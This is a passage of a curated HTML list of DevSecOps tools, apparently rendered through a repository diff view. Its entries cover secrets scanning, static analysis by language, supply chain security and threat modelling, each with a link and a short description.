<em>AWS Labs</em> - Scans commits, commit messages and merges for
|
||||
secrets. Native support for AWS secret patterns, but can be configured
|
||||
to support other patterns.</li>
|
||||
<li><a
|
||||
href="https://nightfall.ai/solutions/product/github">Nightfall</a> -
|
||||
<em>Nightfall</em> - A web-based platform that monitors for sensitive
|
||||
data disclosure across several SDLC tools, including GitHub
|
||||
repositories.</li>
|
||||
<li><a
|
||||
href="https://github.com/auth0/repo-supervisor">Repo-supervisor</a> -
|
||||
<em>Auth0</em> - Secrets scanning tool that can run as a CLI, as a
|
||||
Docker container or in AWS Lambda.</li>
|
||||
<li><a href="https://spectralops.io">SpectralOps</a> - <em>Spectral</em>
|
||||
- Automated code security, secrets, tokens and sensitive data
|
||||
scanning.</li>
|
||||
<li><a
|
||||
href="https://github.com/trufflesecurity/truffleHog">truffleHog</a> -
|
||||
<em>Truffle Security</em> - Searches through git repositories for
|
||||
secrets, digging deep into commit history and branches.</li>
|
||||
</ul>
|
||||
<h3 id="static-analysis">Static Analysis</h3>
|
||||
<p>Static Analysis Security Testing (SAST) tools scan software for
|
||||
vulnerabilities without executing the target software. Typically, static
|
||||
analysis will scan the source code for security flaws such as the use of
|
||||
unsafe functions, hard-coded secrets and configuration issues. SAST
|
||||
tools often come in the form of IDE plugins and CLIs that can be
|
||||
integrated into CI/CD pipelines.</p>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="multi-language-support">Multi-Language Support</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/microsoft/DevSkim">DevSkim</a> -
|
||||
<em>Microsoft</em> - A set of IDE plugins, CLIs and other tools that
|
||||
provide security analysis for a number of programming languages.</li>
|
||||
<li><a href="https://github.com/wireghoul/graudit/">Graudit</a> -
|
||||
<em>Eldar Marcussen</em> - Grep source code for potential security flaws
|
||||
with custom or pre-configured regex signatures.</li>
|
||||
<li><a href="https://github.com/hawkeyesec/scanner-cli">Hawkeye</a> -
|
||||
<em>Hawkeyesec</em> - Modularised CLI tool for project security,
|
||||
vulnerability and general risk highlighting.</li>
|
||||
<li><a href="https://lgtm.com/">LGTM</a> - <em>Semmle</em> - Scan and
|
||||
monitor code for security vulnerabilities using custom or built-in
|
||||
CodeQL queries.</li>
|
||||
<li><a href="https://www.ripstech.com/">RIPS</a> - <em>RIPS
|
||||
Technologies</em> - Automated static analysis for PHP, Java and Node.js
|
||||
projects.</li>
|
||||
<li><a href="https://semgrep.dev/">SemGrep</a> - <em>r2c</em> - Semgrep
|
||||
is a fast, open-source, static analysis tool that finds bugs and
|
||||
enforces code standards at editor, commit, and CI time.</li>
|
||||
<li><a href="https://www.sonarlint.org/">SonarLint</a> -
|
||||
<em>SonarSource</em> - An IDE plugin that highlights potential security
|
||||
security issues, code quality issues and bugs.</li>
|
||||
<li><a href="https://www.sonarqube.org/">SonarQube</a> -
|
||||
<em>SonarSource</em> - Scan code for security and quality issues with
|
||||
support for a wide variety of languages.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="c-c">C / C++</h4>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://github.com/david-a-wheeler/flawfinder">FlawFinder</a> -
|
||||
<em>David Wheeler</em> - Scan C / C++ code for potential security
|
||||
weaknesses.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="c">C</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/pumasecurity/puma-scan">Puma Scan</a> -
|
||||
<em>Puma Security</em> - A Visual Studio plugin to scan .NET projects
|
||||
for potential security flaws.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="configuration-files">Configuration Files</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/instrumenta/conftest">Conftest</a> -
|
||||
<em>Instrumenta</em> - Create custom tests to scan any configuration
|
||||
file for security flaws.</li>
|
||||
<li><a href="https://github.com/selefra/selefra">Selefra</a> -
|
||||
<em>Selefra</em> - An open-source policy-as-code software that provides
|
||||
analytics for multi-cloud and SaaS.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="java">Java</h4>
|
||||
<ul>
|
||||
<li><a href="https://discotek.ca/deepdive.xhtml">Deep Dive</a> -
|
||||
<em>Discotek.ca</em> - Static analysis for JVM deployment units
|
||||
including Ear, War, Jar and APK.</li>
|
||||
<li><a href="https://github.com/find-sec-bugs/find-sec-bugs/">Find
|
||||
Security Bugs</a> - <em>OWASP</em> - SpotBugs plugin for security audits
|
||||
of Java web applications. Supports Eclipse, IntelliJ, Android Studio and
|
||||
SonarQube.</li>
|
||||
<li><a href="https://github.com/spotbugs/spotbugs">SpotBugs</a> -
|
||||
<em>SpotBugs</em> - Static code analysis for Java applications.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="javascript">JavaScript</h4>
|
||||
<ul>
|
||||
<li><a href="https://eslint.org/">ESLint</a> - <em>JS Foundation</em> -
|
||||
Linting tool for JavaScript with multiple security linting rules
|
||||
available.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="go">Go</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/securego/gosec">Golang Security
|
||||
Checker</a> - <em>securego</em> - CLI tool to scan Go code for potential
|
||||
security flaws.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="net">.NET</h4>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://github.com/security-code-scan/security-code-scan">Security
|
||||
Code Scan</a> - <em>Security Code Scan</em> - Static code analysis for
|
||||
C# and VB.NET applications.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="php">PHP</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/phan/phan">Phan</a> - <em>Phan</em> -
|
||||
Broad static analysis for PHP applications with some support for
|
||||
security scanning features.</li>
|
||||
<li><a
|
||||
href="https://github.com/FloeDesignTechnologies/phpcs-security-audit">PHPCS
|
||||
Security Audit</a> - <em>Floe</em> - PHP static analysis with rules for
|
||||
PHP, Drupal 7 and PHP related CVEs.</li>
|
||||
<li><a href="https://github.com/designsecurity/progpilot">Progpilot</a>
|
||||
- <em>Design Security</em> - Static analysis for PHP source code.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="python">Python</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/PyCQA/bandit">Bandit</a> - <em>Python
|
||||
Code Quality Authority</em> - Find common security vulnerabilities in
|
||||
Python code.</li>
|
||||
</ul>
|
||||
<!-- omit in toc -->
|
||||
<h4 id="ruby">Ruby</h4>
|
||||
<ul>
|
||||
<li><a href="https://github.com/presidentbeef/brakeman">Brakeman</a> -
|
||||
<em>Justin Collins</em> - Static analysis tool which checks Ruby on
|
||||
Rails applications for security vulnerabilities.</li>
|
||||
<li><a href="https://github.com/thesp0nge/dawnscanner">DawnScanner</a> -
|
||||
<em>Paolo Perego</em> - Security scanning for Ruby scripts and web
|
||||
application. Supports Ruby on Rails, Sinatra and Padrino
|
||||
frameworks.</li>
|
||||
</ul>
|
||||
<h3 id="supply-chain-security">Supply Chain Security</h3>
|
||||
<p>Supply chain attacks come in different forms, targeting parts of the
|
||||
SDLC that are inherently 3rd party: tools in CI, external code that’s
|
||||
been executed, and more. Supply chain security tooling can defend
|
||||
against these kinds of attacks.</p>
|
||||
<ul>
|
||||
<li><a href="https://github.com/step-security/harden-runner">Harden
|
||||
Runner GitHub Action</a> - <em>StepSecurity</em> - installs a security
|
||||
agent on the GitHub-hosted runner (Ubuntu VM) to prevent exfiltration of
|
||||
credentials, detect compromised dependencies and build tools, and detect
|
||||
tampering of source code during the build.</li>
|
||||
<li><a href="https://github.com/os-scar/overlay">Overlay</a> -
|
||||
<em>SCAR</em> - a browser extension helping developers evaluate open
|
||||
source packages before picking them.</li>
|
||||
<li><a href="https://github.com/spectralops/preflight">Preflight</a> -
|
||||
<em>Spectral</em> - helps you verify scripts and executables to mitigate
|
||||
supply chain attacks in your CI and other systems, such as in the recent
|
||||
<a
|
||||
href="https://spectralops.io/blog/credentials-risk-supply-chain-lessons-from-the-codecov-breach/">Codecov
|
||||
hack</a>.</li>
|
||||
<li><a href="https://www.sigstore.dev/">Sigstore</a> - sigstore is a set
|
||||
of free to use and open source tools, including <a
|
||||
href="https://github.com/sigstore/fulcio">fulcio</a>, <a
|
||||
href="https://github.com/sigstore/cosign">cosign</a> and <a
|
||||
href="https://github.com/sigstore/rekor">rekor</a>, handling digital
|
||||
signing, verification and checks for provenance needed to make it safer
|
||||
to distribute and use open source software.</li>
|
||||
<li><a href="https://github.com/anchore/syft/">Syft</a> -
|
||||
<em>Anchore</em> - A CLI tool for generating a Software Bill of
|
||||
Materials (SBOM) from container images and filesystems.</li>
|
||||
</ul>
|
||||
<h3 id="threat-modelling">Threat Modelling</h3>
|
||||
<p>Threat modelling is an engineering exercise that aims to identify
|
||||
threats, vulnerabilities and attack vectors that represent a risk to
|
||||
something of value. Based on this understanding of threats, we can
|
||||
design, implement and validate security controls to mitigate threats.
|
||||
The following list of tools assist the threat modelling process.</p>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://github.com/hysnsec/awesome-threat-modelling">Awesome
|
||||
Threat Modelling</a> - <em>Practical DevSecOps</em> - A curated list of
|
||||
threat modelling resources.</li>
|
||||
<li><a href="https://www.foreseeti.com/">SecuriCAD</a> -
|
||||
<em>Forseeti</em> - Treat modelling and attack simulations for IT
|
||||
infrastructure.</li>
|
||||
<li><a href="https://iriusrisk.com/">IriusRisk</a> - <em>IriusRisk</em>
|
||||
- Draw threat models and capture threats and countermeasures and manage
|
||||
risk.</li>
|
||||
<li><a href="https://github.com/devsecops/raindance">Raindance
|
||||
Project</a> - <em>DevSecOps</em> - Use attack maps to identify attack
|
||||
surface and adversary strategies that may lead to compromise.</li>
|
||||
<li><a
|
||||
href="https://www.securitycompass.com/sdelements/threat-modeling/">SD
|
||||
Elements</a> - <em>Security Compass</em> - Identify and rank threats,
|
||||
generate actionable tasks and track related tickets.</li>
|
||||
<li><a href="https://owasp.org/www-project-threat-dragon/">Threat
|
||||
Dragon</a> - <em>OWASP</em> - Threat model diagramming tool.</li>
|
||||
<li><a
|
||||
href="https://www.microsoft.com/en-us/securityengineering/sdl/threatmodeling">Threat
|
||||
Modelling Tool</a> - <em>Microsoft</em> - Threat model diagramming
|
||||
tool.</li>
|
||||
<li><a href="https://threatspec.org/">Threatspec</a> -
|
||||
<em>Threatspec</em> - Define threat modelling as code.</li>
|
||||
</ul>
|
||||
<h2 id="related-lists">Related Lists</h2>
|
||||
<ul>
|
||||
<li><a
|
||||
href="https://github.com/analysis-tools-dev/dynamic-analysis/">Awesome
|
||||
Dynamic Analysis</a> - <em>Matthias Endler</em> - A collection of
|
||||
dynamic analysis tools and code quality checkers.</li>
|
||||
<li><a
|
||||
href="https://github.com/shospodarets/awesome-platform-engineering/">Awesome
|
||||
Platform Engineering</a> - A curated list of solutions, tools and
|
||||
resources for <em>Platform Engineering</em></li>
|
||||
<li><a
|
||||
href="https://github.com/analysis-tools-dev/static-analysis/">Awesome
|
||||
Static Analysis</a> - <em>Matthias Endler</em> - A collection of static
|
||||
analysis tools and code quality checkers.</li>
|
||||
<li><a
|
||||
href="https://github.com/hysnsec/awesome-threat-modelling">Awesome
|
||||
Threat Modelling</a> - <em>Practical DevSecOps</em> - A curated list of
|
||||
threat modeling resources.</li>
|
||||
<li><a
|
||||
href="https://owasp.org/www-project-vulnerable-web-applications-directory">Vulnerable
|
||||
Web Apps Directory</a> - <em>OWASP</em> - A collection of vulnerable web
|
||||
applications for learning purposes.</li>
|
||||
</ul>
|
||||
<p><a href="https://github.com/TaptuIT/awesome-devsecops">devsecops.md
|
||||
Github</a></p>
|
||||
Reference in New Issue
Block a user